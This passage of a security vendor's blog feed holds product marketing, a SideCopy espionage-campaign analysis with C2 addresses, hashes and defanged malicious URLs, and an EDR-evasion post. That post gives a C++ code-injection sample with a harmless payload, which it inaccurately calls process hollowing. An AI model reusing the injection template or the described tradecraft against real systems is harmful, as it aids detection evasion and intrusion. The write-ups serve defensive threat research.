file upload, and download.</p><blockquote>Developers can use these endpoints to integrate Vortex's detection engine into their own security applications or workflows. For example, a security application could use the Vortex API to scan files for malware before allowing them to be uploaded to a server.</blockquote><figure class="kg-card kg-image-card kg-width-full"><img src="https://cyberstanc.com/blog/content/images/2023/04/image-26.png" class="kg-image" alt></figure><p>To ensure security, the Vortex API uses token-based authentication, which requires users to authenticate using an access token. This helps to prevent unauthorized access to the API and ensures that only authorized users are able to interact with the Vortex detection engine.</p><h2></h2><h2 id="understanding-the-recognized-media-formats-for-deep-archives">Understanding the Recognized Media Formats for Deep Archives</h2><p></p><p>Note: When using a file upload feature, it's important to keep in mind that the maximum default file size is <strong>99MB per upload</strong>. However, this can be configured to accommodate larger file sizes in on-premises deployments. </p><p>Additionally, it's worth noting that the MIME type of the uploaded file is automatically detected regardless of the provided file suffix. This can help ensure that the uploaded file is processed and handled correctly, regardless of any discrepancies between the file extension and its actual contents.</p><figure class="kg-card kg-image-card"><img src="https://cyberstanc.com/blog/content/images/2023/04/image-15.png" class="kg-image" alt></figure><blockquote><br>Common Archives: 7Z, ACE, GZIP, LZIP, ISO, RAR, TAR, ZIP</blockquote><blockquote>Microsoft Office Files: DOC, DOCM, DOCX, DOT, DOTM, DOTX, PPSX, PPT, PPTM, PPTX, XLS, XLSM, XLSX</blockquote><blockquote>Email Files: EML, MBOX</blockquote><blockquote>Web Files: HTA, HTML, SVG</blockquote><blockquote>Scrutinized-Eyes on Malware Installation File Types: .exe, .dll, .bat, .cmd, .js, .vbs, .docm, .xlsm, .pptm, .jar, .py, .scr, .reg, .ps1, .hta, .chm, .lnk, .msi, .pif, .com.</blockquote><p></p><h2 id="automating-analysis-and-mitigation-tasks-with-vortex-integration">Automating Analysis and Mitigation Tasks with Vortex Integration</h2><p><br>Integration of the Vortex with existing security infrastructure could provide several benefits.</p><blockquote><br>First, it could improve the accuracy of threat detection by incorporating machine learning algorithms into the analysis process, users can add custom YARA rules, and threat feeds integration with a TIP, SOAR, SIEM system, such as Microsoft, IBM or Splunk.</blockquote><blockquote><br>Second, it could improve the response time to cyber threats by automating the mitigation process. In addition, the Vortex's automated mitigation process can continuously learn and adapt to new threats, improving its effectiveness over time.</blockquote><blockquote><br>Third, it could reduce the workload of human analysts by automating some of the analysis and mitigation tasks. For example, the Vortex can be configured to prioritize high-risk threats and take immediate action to mitigate their impact, while lower-risk threats can be flagged for further analysis by human analysts.</blockquote><figure class="kg-card kg-image-card kg-width-full"><img src="https://cyberstanc.com/blog/content/images/2023/04/image-24.png" class="kg-image" alt></figure><h2 id="get-the-best-of-both-worlds-with-vortex-cloud-and-on-premises-deployment">Get the Best of Both Worlds with Vortex Cloud and On-Premises Deployment</h2><blockquote><br>To support both cloud and on-premises deployment of Vortex, the platform can be installed and configured to run on cloud infrastructure such as <strong>Amazon Web Services (AWS), Microsoft Azure, or Google Cloud Platform (GCP). </strong>This allows customers to take advantage of the scalability and flexibility of cloud computing while still benefiting from Vortex's malware detection capabilities.</blockquote><p>For on-premises deployment, customers can install Vortex on their own servers or hardware with minimum server configuration of <strong>Window/Ubuntu Server, 8 vCPUs, 16GB RAM, and 32GB SSD</strong>. Customers can scale up their hardware configuration based on their specific needs and the number of scans they require per day.</p><h2 id="scaling-vortex-for-high-volume-scanning-needs">Scaling Vortex for High-Volume Scanning Needs</h2><p><br>The peak performance for a single-server deployment of the Vortex is 50,000 scans per day or approximately 1,500-2500 scans per hour. The average processing time per scan is around 3-5 seconds, though it can vary based on the input mix.<br></p><blockquote>If the customer requires more than 100,000 scans/day, a custom multi-server setup is necessary and needs to be scoped out with the engineering team.</blockquote><h2 id="cyberstanc-vortex-vs-virus-total-a-technical-comparison">Cyberstanc Vortex vs. Virus Total: A Technical Comparison</h2><p></p><p>When it comes to malware detection and analysis, VirusTotal is a popular tool that is often used by security analysts and researchers. It allows users to upload files and URLs for scanning, and uses multiple antivirus engines to detect any potential threats. </p><blockquote>Cyberstanc Vortex provides comprehensive analysis by examining metadata, file structure, and relationships between files to identify threats with simulation intelligence. Its ability to analyze third-party apps sets it apart such as plugins and extensions, to detect any hidden threats.</blockquote><blockquote>Another advantage of Cyberstanc Vortex is its ability to provide actionable intelligence. Major anti-virus solutions in Virus Total may flag a file as suspicious, but they may not provide any information on how to mitigate the threat.</blockquote><blockquote>Finally, Cyberstanc Vortex detections accuracy is much faster than traditional anti-virus solutions, who majorly rely on malware signature. It can analyze files and codes at scale and speed, allowing security teams to quickly identify and respond to threats. Additionally, it reduces the number of artifacts that need to be sandboxed, saving time and resources.</blockquote><h3 id="with-cyberstanc-vortex-however-users-receive-detailed-information-on-the-nature-of-the-threat-including-the-type-of-malware-and-its-behavior-this-allows-security-teams-to-take-immediate-action-to-contain-and-remediate-the-threat-">With Cyberstanc Vortex, however, users receive detailed information on the nature of the threat, including the type of malware and its behavior. This allows security teams to take immediate action to contain and remediate the threat.</h3><figure class="kg-card kg-image-card kg-width-full"><img src="https://cyberstanc.com/blog/content/images/2023/04/image-28.png" class="kg-image" alt></figure><h2 id="-no-data-acquisition-policy-a-game-changer-in-user-privacy">** No-Data Acquisition Policy: A Game Changer in User Privacy</h2><p><br>Cyberstanc Vortex is designed with user privacy in mind. The platform does not collect any data from the user or their system. No company information is uploaded to mass users or any third party without the user's consent. This ensures that the user's data is safe and protected.</p><p></p><p></p><h2></h2><h2 id="problem-solving-industry-case-studies">Problem-solving Industry case studies</h2><h3 id="the-vortex-is-a-powerful-tool-that-can-help-organizations-across-different-industries-protect-themselves-from-cyber-threats-"><br>The Vortex is a powerful tool that can help organizations across different industries protect themselves from cyber threats. </h3><p>Here are some examples of how the Vortex can be used in specific industries:</p><blockquote><br><strong>Financial institutions</strong> are no strangers to cyber threats, particularly when it comes to banking trojan, data-theft and ransomware attacks.<br>For example, the Vortex can be integrated into a financial institution's security infrastructure to analyze suspicious emails and attached documents. It can also monitor file activity to detect any unusual behavior that may signal a malware or ransomware attack.</blockquote><blockquote><strong>Critical infrastructure</strong> is also vulnerable to cyber threats that could have catastrophic consequences. The Vortex can be used to create air-gap containers and train models to determine what data should be allowed to pass through the container.<br>For example, a critical nuclear or power plant could use the Vortex to analyze data from sensors and determine if any readings indicate a potential safety risk. If a safety risk is detected, the Vortex could take action to mitigate the risk.</blockquote><blockquote><strong>In the supply chain</strong>, the Vortex can be used to analyze and validate new software before it is applied to a system.<br>For example, a software development company could use the Vortex to analyze a new release and determine if it contains any malicious code. If it does, the company could take action to remove the malicious code before releasing the software to customers.</blockquote><blockquote>The <strong>military</strong> could also use the Vortex to detect and mitigate cyber threats at the local level.<br>For example, if a military installation notices suspicious activity on their network or reverify a usb, the Vortex could analyze the activity to determine if it poses a threat. If it does, the Vortex could then take action to neutralize the threat.</blockquote><p></p><h2 id="final-thoughts">Final thoughts</h2><p><br>It offers a wide range of features that go beyond the capabilities of traditional static analysis tools, making it an ideal choice for organizations looking to enhance their security posture.</p><p>Unlike other threat intelligence platforms, Cyberstanc Vortex does not collect any data or upload any company information, making it a reliable and trustworthy choice for organizations concerned about data privacy and security.</p><p>The Vortex can be integrated with existing security infrastructure, allowing organizations to improve their threat detection and response capabilities, automate some analysis and mitigation tasks, and reduce the workload of human analysts. With its simple and cost-effective deployment options, Cyberstanc Vortex is an accessible solution for organizations of all sizes and industries.</p><h2 id="at-cyberstanc-we-are-committed-to-ensuring-a-safer-and-more-secure-digital-world-for-all-">At Cyberstanc, we are committed to ensuring a safer and more secure digital world for all.</h2><p></p><blockquote>Apart from our Vortex platform, we also provide the <a href="https://cyberstanc.com/blog/ripx/">RIPx scanner and threat intelligence service.</a> This powerful service is designed to provide real-time threat detection and analysis, using cutting-edge technology and threat intelligence. It has already been consumed by product-based companies, Auditors, Pen-testers and our threat intelligence partners and OEM clients providing them with comprehensive detection mechanism.</blockquote><p>Is your organization ready to combat the evolving cyber threats? Contact us at <a href="mailto:Sales@cyberstanc.com">Sales@cyberstanc.com</a> to explore our advanced cybersecurity solutions. Our cutting-edge Vortex platform, AV/EDR companion, and more can protect your business. Schedule a in-house demo or meeting at <a href="https://cyberstanc.com/request-a-demo/">https://cyberstanc.com/request-a-demo/</a> and secure your future. </p><p></p><p>Additionally, join us in shaping the future of cybersecurity technology through the exciting co-build opportunity offered by Vortex, the ultimate platform designed specifically for SOC teams, Threat Hunters, and Researchers. </p><p>With Vortex, you'll have all the tools you need to combat cyber threats at your fingertips. Experience its power with a <strong>30-day freemium access</strong>, allowing you to explore its full capabilities.</p><p>Visit <a href="https://vortex.cyberstanc.com/">https://vortex.cyberstanc.com/</a> and Sign-up today!</p><p></p><figure class="kg-card kg-embed-card"><iframe width="356" height="200" src="https://www.youtube.com/embed/UOrmM8r6NbI?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" allowfullscreen title="Cyberstanc Vortex: Revolutionizing Cybersecurity with Unmatched Accuracy and Reliability"></iframe></figure>]]></content:encoded></item><item><title><![CDATA[Indian Ministry of Defense-Themed Trojan: A SideCopy Signature]]></title><description><![CDATA[<figure class="kg-card kg-image-card kg-width-full"><img src="https://cyberstanc.com/blog/content/images/2023/04/Ministry-of-Defense-themed-Trojan.png" class="kg-image" alt></figure><p></p><p>Recently, a cyber espionage campaign was discovered which targeted Indian defence contractors, aerospace, and research organizations. This campaign used various tactics to compromise its victims and extract sensitive information.</p><p>In this blog, we will analyze the two tools used in this campaign - <strong>Action RAT and AllaKore RAT</strong>, examining their</p>]]></description><link>https://cyberstanc.com/blog/indian-ministry-of-defense-themed-trojan-a-sidecopy-signature/</link><guid isPermaLink="false">644355447c2a7bee1d252b5a</guid><category><![CDATA[malware]]></category><category><![CDATA[Scrutiny]]></category><dc:creator><![CDATA[admin]]></dc:creator><pubDate>Wed, 19 Apr 2023 17:22:02 GMT</pubDate><content:encoded><![CDATA[<figure class="kg-card kg-image-card kg-width-full"><img src="https://cyberstanc.com/blog/content/images/2023/04/Ministry-of-Defense-themed-Trojan.png" class="kg-image" alt></figure><p></p><p>Recently, a cyber espionage campaign was discovered which targeted Indian defence contractors, aerospace, and research organizations. This campaign used various tactics to compromise its victims and extract sensitive information.</p><p>In this blog, we will analyze the two tools used in this campaign - <strong>Action RAT and AllaKore RAT</strong>, examining their associated command and control (C2) infrastructure. We will also explore the threat telemetry data that surrounds these C2 servers and discuss how the attackers manage their infrastructure.</p><h2 id="overview-of-the-attack">Overview of the Attack</h2><p>In this attack, the SideCopy group used spear-phishing emails with LNK files in compressed packages as the attack entry point. The LNK file is a malicious file that accesses the command and control (C2) server using mshta.exe in the system to download and execute subsequent payloads. The final payload is an improved open-source Trojan horse written in Delphi or a new Trojan horse written in C++, with the bait content related to the Indian Ministry of Defense. </p><blockquote>Spear-phishing and Compressed Packages: The old Tactics of SideCopy Group</blockquote><h2 id="the-attack-process-is-as-follows-"><br>The attack process is as follows:</h2><p></p><blockquote>Spear-phishing emails, with LNK files in compressed packages as the attack entry point.</blockquote><blockquote><br>Loading and executing subsequent payloads in memory without files.</blockquote><blockquote><br>The final payload is an improved open-source Trojan horse written in Delphi or a new Trojan horse written in C++.</blockquote><blockquote><br>The bait content is related to the Indian Ministry of Defense.</blockquote><blockquote>Outbound Activity Analysis of sidecopy's C2 Server</blockquote><p></p><h2 id="phase-one-sidecopy-group-s-spear-phishing-emails-and-malicious-payloads">Phase One : SideCopy Group's Spear-Phishing Emails and Malicious Payloads</h2><p></p><p>The SideCopy group has been using spear-phishing emails as the primary method to deliver their malicious payloads. In this attack activity, they used a compressed multiple package multiple-type "XYZ.zip," which contained a bait LNK file. The LNK file, when clicked, accessed the C2 using mshta.exe to download and execute subsequent payloads.</p><p><br>The link in the LNK file redirected to malicious site which downloaded a piece of JS code to execute. The main function of this JS code was to load DLL in memory, decrypt the embedded data in the JS code through the functions in the DLL, and drop the PDF bait. The function "openthefile" decrypted and released the PDF bait. The displayed PDF bait was related to the Indian Ministry of Defense.</p><figure class="kg-card kg-image-card kg-width-full"><img src="https://cyberstanc.com/blog/content/images/2023/04/image-10.png" class="kg-image" alt></figure><blockquote>file: ffa2e6f6a7a8001f56c352df43af3fe5 Cyber Advisory 2023.docm         </blockquote><blockquote> dl-url: http[:]//luckyoilpk[.]com/vlan.html payload </blockquote><blockquote><a href="https://twitter.com/hashtag/ReverseRAT?src=hashtag_click">#ReverseRAT</a> (aka <a href="https://twitter.com/hashtag/CetaRAT?src=hashtag_click">#CetaRAT</a>): 0baa1d0cc20d80fa47eeb764292b9e98 CnC: http[:]//185.174.102[.]54:443</blockquote><p>The JS code also obtained the information of installed antivirus software, concatenated it with the string "anvaro =," and uploaded it to C2 server using the POST method. </p><p>It then created the directory "C:\ProgramData\ABC," accessed the C2 to download data, and saved it in "C:\ProgramData\ABC\jquery.hta" and "C:\ProgramData\ABC\jscy.hta" files, and then executed them.</p><p></p><p></p><h2 id="phase-two-the-aftermath-of-the-attack-on-quick-heal-and-other-av-software">Phase Two : The Aftermath of the Attack on Quick Heal and Other AV Software</h2><p></p><p><strong>The SearchProducts function compares the antivirus software to decide how to start the subsequent payloads. When the Indian antivirus software "Quick Heal" is present, the first step is to copy Credwiz.exe file in the system to the directory “C:\Users\Public\smitpr” and rename it as “crezly.exe”.</strong></p><p></p><p>The code checks if the antivirus software is "Quick Heal." If it is, the function performs the following steps:</p><blockquote>Copies the Credwiz.exe file to the directory "C:\Users\Public\smitpr" and renames it as "crezly.exe."</blockquote><blockquote>Decrypts the DLL data and renames it as "DUser.dll" in the "C:\Users\Public\smitpr" directory.</blockquote><blockquote>Decrypts the EXE data and drops the program "simsre.exe" in the "smitpr" directory.</blockquote><blockquote>Sleeps for 30 seconds.</blockquote><blockquote>Calls the released "crezly.exe" program to side-load the malicious "DUser.dll."</blockquote><blockquote>Generates a bat file to add a startup item for the crezly.exe program through the registry.</blockquote><p>During the execution, a bat file was generated, which added a startup item for the crezly.exe program through the registry. When the antivirus software was Kaspersky, Avast, Bitdefender, WindowsDefender, or others, the way of releasing the malicious component was basically the same as that of the Indian antivirus software "Quick Heal," except that it slept for one minute and then started the released simsre.exe program directly, and the program added to the startup item through the registry was also simsre.exe.</p><p>If the antivirus software is not "Quick Heal," the function performs the following steps:</p><blockquote>Sleeps for 1 minute.</blockquote><blockquote>Starts the released "simsre.exe" program directly.</blockquote><blockquote>Generates a bat file to add a startup item for the "simsre.exe" program through the registry.</blockquote><p></p><h2 id="phase-three-allakore-rat-s-file-upload-download-accessing-sensitive-information-made-easy">Phase Three : AllaKore RAT's File Upload/Download: Accessing Sensitive Information Made Easy</h2><p></p><p><strong>AllaKore RAT</strong>, also known as Cyrus, is a remote access trojan that is commonly used by cybercriminals to gain unauthorized access to victim's computers. This RAT has been modified by the SideCopy group and is a variant of the open-source RAT that can bypass most antivirus and endpoint detection and response (EDR) tools. In this technical analysis, we will discuss the capabilities and techniques used by AllaKore RAT to evade detection.</p><h3 id="action-rat-is-a-tool-that-is-used-to-receive-commands-from-the-c2-server-retrieve-information-from-the-victim-machine-execute-further-payloads-and-upload-information-back-to-the-c2-">Action RAT is a tool that is used to receive commands from the C2 server, retrieve information from the victim machine, execute further payloads, and upload information back to the C2. </h3><blockquote>It is dropped onto the victim machine alongside a benign executable which is used to sideload it, in order to avoid detection.</blockquote><h3 id="capabilities-of-allakore-rat">Capabilities of AllaKore RAT</h3><p>AllaKore RAT has various capabilities that allow attackers to gain complete control over the victim's system. </p><p>Some of the main functions of AllaKore RAT are:</p><blockquote><strong>Keylogger</strong>: AllaKore RAT has a built-in keylogger that can log all the keystrokes made by the victim, including usernames, passwords, and other sensitive information.</blockquote><blockquote><strong>Screenshots</strong>: AllaKore RAT can capture screenshots of the victim's desktop and send them back to the attacker's C&amp;C server.</blockquote><blockquote><strong>List folders and files</strong>: AllaKore RAT can list all the files and folders on the victim's computer, giving the attacker a clear idea of the victim's file structure.</blockquote><blockquote><strong>Upload/download files</strong>: AllaKore RAT can upload and download files from the victim's computer, giving the attacker access to sensitive information.</blockquote><blockquote><strong>Steal clipboard data</strong>: AllaKore RAT can steal data from the victim's clipboard, including passwords and other sensitive information.</blockquote><blockquote><strong>Change wallpaper</strong>: AllaKore RAT can change the victim's desktop wallpaper to display a message from the attacker.</blockquote><blockquote><strong>Remote control</strong>: AllaKore RAT allows the attacker to remotely control the victim's computer, giving them complete access to the system.</blockquote><h3 id="techniques-used-by-allakore-rat-to-evade-detection">Techniques used by AllaKore RAT to evade detection</h3><p></p><blockquote><strong>Code obfuscation</strong>: AllaKore RAT uses code obfuscation techniques to hide its malicious code from antivirus and EDR tools.</blockquote><blockquote><strong>Fileless execution</strong>: AllaKore RAT can execute its code in memory, without creating any files on the victim's system. </blockquote><blockquote><strong>Process injection</strong>: AllaKore RAT uses process injection techniques to inject its code into legitimate processes running on the victim's system. </blockquote><blockquote><strong>C&amp;C communication encryption</strong>: AllaKore RAT encrypts its communication with the C&amp;C server using various encryption algorithms, making it difficult to detect its network traffic.</blockquote><h3></h3><h2 id="sidecopy-uncovers-transparent-tribe-s-latest-cyber-espionage-plot-with-indian-mod-theme">SideCopy Uncovers Transparent Tribe's Latest Cyber Espionage Plot with Indian MoD Theme</h2><p>Two samples of Action RAT (loaded as DUser.dll). </p><blockquote>Stage 1: feeadc91373732d65883c8351a6454a77a063ff5 (DRDO - K4 Missile Clean room.pptx.lnk)</blockquote><blockquote>Tags: mshta,lnk,html<br><a href="http://www.cornerstonebeverly[.]org/"><strong>www.cornerstonebeverly[.]org</strong></a>, ilovepdf[.]com</blockquote><blockquote>Action RAT: 3c4c8cbab1983c775e6a76166f7b3c84dde8c8c5 (DUser.dll)</blockquote><blockquote>C2: 144.91.72.17:8080 (Contabo GmbH)</blockquote><figure class="kg-card kg-image-card"><img src="https://cyberstanc.com/blog/content/images/2023/04/image-9.png" class="kg-image" alt></figure><figure class="kg-card kg-image-card"><img src="https://cyberstanc.com/blog/content/images/2023/04/image-7.png" class="kg-image" alt></figure><p>The other sample had the following details:</p><blockquote>Stage 1: 0d68a135b1f4be18481cf44ed02bcbf82aeb542e (Cyber Advisory - Profiles (Pic and Mob No) of PIOs.docx.lnk)</blockquote><blockquote>C2: <strong>www.kwalityproducts[.]com</strong></blockquote><blockquote>Action RAT: cb031561fd76643885671922db7d5b840060334d (DUser.dll)</blockquote><blockquote>C2: 84.46.250.78:8080 (Contabo GmbH)</blockquote><figure class="kg-card kg-image-card kg-width-full"><img src="https://cyberstanc.com/blog/content/images/2023/04/image-8.png" class="kg-image" alt></figure><p></p><p></p><h2 id="phase-4-analysis-of-outbound-activity-from-c2-servers-in-action-rat-and-allakore-rat-campaign">Phase 4: Analysis of Outbound Activity from C2 Servers in Action RAT and AllaKore RAT Campaign</h2><p><br>In early 2023, a targeted campaign using the Action RAT and AllaKore RAT malware was observed, with all 18 victims located in India. Initial victim connections to the command and control (C2) servers associated with Action RAT were observed on February 6 and March 15, respectively.</p><p>Further analysis of outbound activity from the C2 servers revealed connections to <strong>IMMEDION</strong>, a US provider, via 84.46.250.78. However, WHOIS data indicated that IMMEDION was located in Pakistan, suggesting that actors located in Pakistan were managing the infrastructure. Communication sourced from 17 distinct IPs assigned to Pakistani mobile providers and Proton VPN nodes were observed during the period of interest, indicating the threat actors accessed their infrastructure within a typical working week cadence.</p><p>The SideCopy malware campaign has been actively spreading in the wild, targeting victims in India and potentially other regions. The campaign utilizes a DLL-based malware loader and Indian Ministry of Defense-themed Trojan to compromise victims' systems and steal sensitive data.</p><p></p><h2 id="our-closing-remarks-on-sidecopy-s-cyber-threats">Our closing remarks on SideCopy's cyber threats</h2><p></p><p>In conclusion, the SideCopy group continues to pose a significant threat to organizations, particularly in India and other countries. Their use of sophisticated tactics such as spear-phishing emails and DLL-based malware loaders highlights their determination to evade detection and compromise their targets. </p><p>At Cyberstanc, we remain dedicated to researching and analyzing APT groups such as SideCopy, and providing our clients with advanced cybersecurity solutions to protect against emerging threats. Our Secure-Tech service offers comprehensive internal and third-party application scrutiny scans, using a convenient Pay-As-You-Go model.</p><p>SideCopy Trojan Dropper  : <a>fa6c832e22f978b8210c0630db69e6a2</a></p><p> "<a href="https://polyswarm.network/scan/results/file/d3b0efc4efbef68c3a4bbc9a71b95ed186b3511141597a38071c51e1a9ad01b0">https://polyswarm.network/scan/results/file/d3b0efc4efbef68c3a4bbc9a71b95ed186b3511141597a38071c51e1a9ad01b0</a>"</p><figure class="kg-card kg-image-card"><img src="https://cyberstanc.com/blog/content/images/2023/04/image-11.png" class="kg-image" alt></figure><p>We invite you to visit our blog for detailed analysis of APT36 Transparent Tribe and other threat actors, and to contact us at <a href="mailto:Sales@cyberstanc.com">Sales@cyberstanc.com</a> to learn more about how we can help protect your organization from cyber threats. Our cutting-edge technologies and commitment to cybersecurity make us a trusted partner in ensuring a safer and more secure digital world for all.</p><p>"<a href="https://cyberstanc.com/blog/a-look-into-apt36-transparent-tribe/">https://cyberstanc.com/blog/a-look-into-apt36-transparent-tribe/</a>"</p><p></p><h2 id="ioc-information-">IOC Information:</h2><p>URLs:</p><blockquote><a href="https://kcps.edu[.]in/css/fonts/files/docs/graentsodocumentso/ganeshostwoso/snbtoolswires.hta">https://kcps.edu[.]in/css/fonts/files/docs/graentsodocumentso/ganeshostwoso/snbtoolswires.hta</a></blockquote><blockquote><a href="https://kcps.edu[.]in/css/fonts/files/avena/">https://kcps.edu[.]in/css/fonts/files/avena/</a></blockquote><blockquote><a href="https://kcps.edu[.]in/css/fonts/files/ntsfonts/">https://kcps.edu[.]in/css/fonts/files/ntsfonts/</a></blockquote><blockquote><a href="https://kcps.edu[.]in/css/fonts/files/jquery/">https://kcps.edu[.]in/css/fonts/files/jquery/</a></blockquote><blockquote><a href="https://www[.]cornerstonebeverly.org/js/files/docufentososo/doecumentosoneso/pantomime.hta">https://www[.]cornerstonebeverly.org/js/files/docufentososo/doecumentosoneso/pantomime.hta</a></blockquote><blockquote><a href="https://cornerstonebeverly[.]org/js/files/ntfonts/avena/">https://cornerstonebeverly[.]org/js/files/ntfonts/avena/</a></blockquote><blockquote><a href="https://cornerstonebeverly[.]org/js/files/ntfonts/">https://cornerstonebeverly[.]org/js/files/ntfonts/</a></blockquote><blockquote><a href="https://hpuniversity[.]in/uploadsssss/files/file2/file2.zip">https://hpuniversity[.]in/uploadsssss/files/file2/file2.zip</a></blockquote><blockquote><a href="https://hpuniversity[.]in/uploadsssss/files/file3/file3.zip">https://hpuniversity[.]in/uploadsssss/files/file3/file3.zip</a></blockquote><blockquote><a href="https://hpuniversity[.]in/uploadsssss/files/women/Women.zip">https://hpuniversity[.]in/uploadsssss/files/women/Women.zip</a></blockquote><blockquote><a href="https://hpuniversity[.]in/uploadsssss/files/survey/Survry.zip">https://hpuniversity[.]in/uploadsssss/files/survey/Survry.zip</a></blockquote><blockquote><a href="http://hpuniversity[.]in/filessss/software/SoftWare.zip">http://hpuniversity[.]in/filessss/software/SoftWare.zip</a></blockquote><blockquote><a href="https://hpuniversity[.]in/filessss/principles/Principles.zip">https://hpuniversity[.]in/filessss/principles/Principles.zip</a></blockquote><blockquote><a href="https://hpuniversity[.]in/documents/survey/start/2.hta">https://hpuniversity[.]in/documents/survey/start/2.hta</a></blockquote><blockquote><a href="https://hpuniversity[.]in/documents/women/Women.zip">https://hpuniversity[.]in/documents/women/Women.zip</a></blockquote><p>IPs:</p><blockquote>89.117.63.146:9921</blockquote><blockquote>185.229.119.60:9134</blockquote><blockquote>144.91.72.17:8080</blockquote><blockquote>13.107.21.200</blockquote><blockquote>40.113.103.199</blockquote><blockquote>104.123.111.225</blockquote><blockquote>162.159.36.2</blockquote><blockquote>184.50.166.121</blockquote><blockquote>193.138.218.74</blockquote><p></p><p>To better protect against this threat, it is important to stay informed about the latest developments and take proactive measures to defend against potential attacks. Researchers should monitor the IOC information provided and report any suspicious activity to relevant authorities.</p>]]></content:encoded></item><item><title><![CDATA[The Truth About EDR: False Positives and Bypasses Uncovered]]></title><description><![CDATA[<figure class="kg-card kg-image-card"><img src="https://cyberstanc.com/blog/content/images/2023/04/edr.jpg" class="kg-image" alt></figure><p></p><p>The adoption of Endpoint Detection and Response (EDR) products has become a cornerstone in the cybersecurity strategy of many organizations. These products are designed to monitor, detect, and respond to potential threats and suspicious activities on endpoints such as computers, servers, and other devices within a network. However, as much</p>]]></description><link>https://cyberstanc.com/blog/the-truth-about-edr-false-positives-and-bypasses-uncovered/</link><guid isPermaLink="false">64412a2db9ced4f10891bc71</guid><category><![CDATA[Scrutiny]]></category><category><![CDATA[swatbox]]></category><dc:creator><![CDATA[admin]]></dc:creator><pubDate>Wed, 19 Apr 2023 12:45:00 GMT</pubDate><media:content url="https://cyberstanc.com/blog/content/images/2023/04/edr-1.jpg" medium="image"/><content:encoded><![CDATA[<figure class="kg-card kg-image-card"><img src="https://cyberstanc.com/blog/content/images/2023/04/edr.jpg" class="kg-image" alt="The Truth About EDR: False Positives and Bypasses Uncovered"></figure><img src="https://cyberstanc.com/blog/content/images/2023/04/edr-1.jpg" alt="The Truth About EDR: False Positives and Bypasses Uncovered"><p></p><p>The adoption of Endpoint Detection and Response (EDR) products has become a cornerstone in the cybersecurity strategy of many organizations. These products are designed to monitor, detect, and respond to potential threats and suspicious activities on endpoints such as computers, servers, and other devices within a network. However, as much as these products are useful, there's a dark reality behind them that organizations need to understand.</p><p>Consider a company ABC that invested in an EDR solution to bolster their cybersecurity posture. They went through the rigorous process of installation and migration of their existing data and workflows to the new EDR solution. They felt confident that their network was now fully secured, but they were wrong.</p><blockquote>One day, their EDR solution raised a suspicious activity alert, indicating a potential threat on one of their endpoints. They immediately dispatched their cybersecurity team to investigate the issue. After hours of investigation, they discovered that the alert was a<strong> false positive </strong>triggered by EDR telemetry noise. In other words, the telemetry data generated by their EDR solution was not precise enough, and as a result, it produced false positives.</blockquote><p>The cybersecurity team shrugged off the issue and marked it as a one-off event. However, they were unaware that the lack of precise telemetry data would become a huge problem for them in the future. The EDR solution provided a false sense of security that left the company vulnerable to more sophisticated attacks.</p><p>The attackers knew that the EDR solution in use had a weak telemetry system and took advantage of it. They launched a sophisticated attack that bypassed the EDR solution without raising any alarms. The attackers went undetected and moved laterally across the company's network, causing significant damage.</p><p>The company was left wondering what went wrong despite investing a significant amount of money and resources in an EDR solution. The answer was simple, their EDR solution was not providing enough telemetry data, which led to a false sense of security and left them vulnerable to attacks.</p><p>However, attackers can use techniques such as code obfuscation and process hollowing to evade detection by EDR solutions.</p><h3 id="code-obfuscation-involves-modifying-the-code-of-an-application-or-malware-to-make-it-difficult-for-edr-solutions-to-analyze-">Code obfuscation involves modifying the code of an application or malware to make it difficult for EDR solutions to analyze. </h3><p>For example, an attacker can use encryption or compression techniques to hide the malicious code. EDR solutions may not be able to analyze the encrypted or compressed code and may miss the threat.</p><figure class="kg-card kg-image-card"><img src="https://cyberstanc.com/blog/content/images/2023/04/image-5.png" class="kg-image" alt="The Truth About EDR: False Positives and Bypasses Uncovered"></figure><h2 id="process-hollowing-is-another-technique-used-to-evade-edr-solutions-in-process-hollowing-an-attacker-creates-a-new-process-in-the-suspended-state-and-replaces-its-code-with-malicious-code-">Process hollowing is another technique used to evade EDR solutions. In process hollowing, an attacker creates a new process in the suspended state and replaces its code with malicious code.</h2><p>The attacker then resumes the process, and the malicious code runs in the context of the legitimate process. EDR solutions may not be able to detect the malicious activity because it appears to be part of a legitimate process.</p><p>Let's take a look at a technical code example of process hollowing:</p><blockquote><code>#include &lt;Windows.h&gt; int main(int argc, char* argv[]) { // Create a new suspended process    STARTUPINFO si = { sizeof(si) }; PROCESS_INFORMATION pi; if (!CreateProcess(TEXT("C:\\Windows\\System32\\notepad.exe"), NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &amp;si, &amp;pi)) { return 1; } // Allocate memory for the malicious code </code></blockquote><blockquote><code>SIZE_T size = 4096; LPVOID address = VirtualAllocEx(pi.hProcess, NULL, size, MEM_COMMIT, PAGE_EXECUTE_READWRITE); if (!address) { return 1; } // Write the malicious code to the allocated memory    BYTE code[] = { 0x90, 0xc3 }; // NOP and RET    SIZE_T written; if (!WriteProcessMemory(pi.hProcess, address, code, sizeof(code), &amp;written)) { return 1; } // Replace the code of the suspended process with the malicious code</code></blockquote><blockquote><code>HANDLE thread = CreateRemoteThread(pi.hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)address, NULL, 0, NULL); if (!thread) { return 1; } // Resume the suspended process    ResumeThread(pi.hThread); return 0; }</code></blockquote><p>This code creates a new suspended process using the Windows API function <code>CreateProcess</code> and then allocates memory in the suspended process using <code>VirtualAllocEx</code>. It then writes the malicious code (two assembly instructions that do nothing but return) to the allocated memory using <code>WriteProcessMemory</code>. Finally, it replaces the code of the suspended process with the malicious code using <code>CreateRemoteThread</code> and resumes the suspended process.</p><figure class="kg-card kg-image-card kg-width-full"><img src="https://cyberstanc.com/blog/content/images/2023/04/image-6.png" class="kg-image" alt="The Truth About EDR: False Positives and Bypasses Uncovered"></figure><h3></h3><h2 id="the-edr-telemetry-project-a-comprehensive-comparison">The EDR Telemetry Project: A Comprehensive Comparison</h2><p>To address the issue of EDR telemetry, a group of experts came together to create the EDR Telemetry project. The goal of the project is to encourage EDR vendors to be more transparent about the telemetry they provide to their customers. The project aims to compare the telemetry generated by different EDR products, helping users make informed decisions when selecting EDR products.</p><p>The project methodology involves a systematic approach to ensure the accuracy and reliability of the information presented. The comparison table compares the available telemetry for different EDR products. The data in the table does not represent the capability of each EDR product to detect or prevent a threat, but only focuses on the available telemetry for each product.</p><p></p><ul><li><strong><strong>Official project page:</strong></strong> <a href="https://github.com/tsale/EDR-Telemetry" rel="noopener ugc 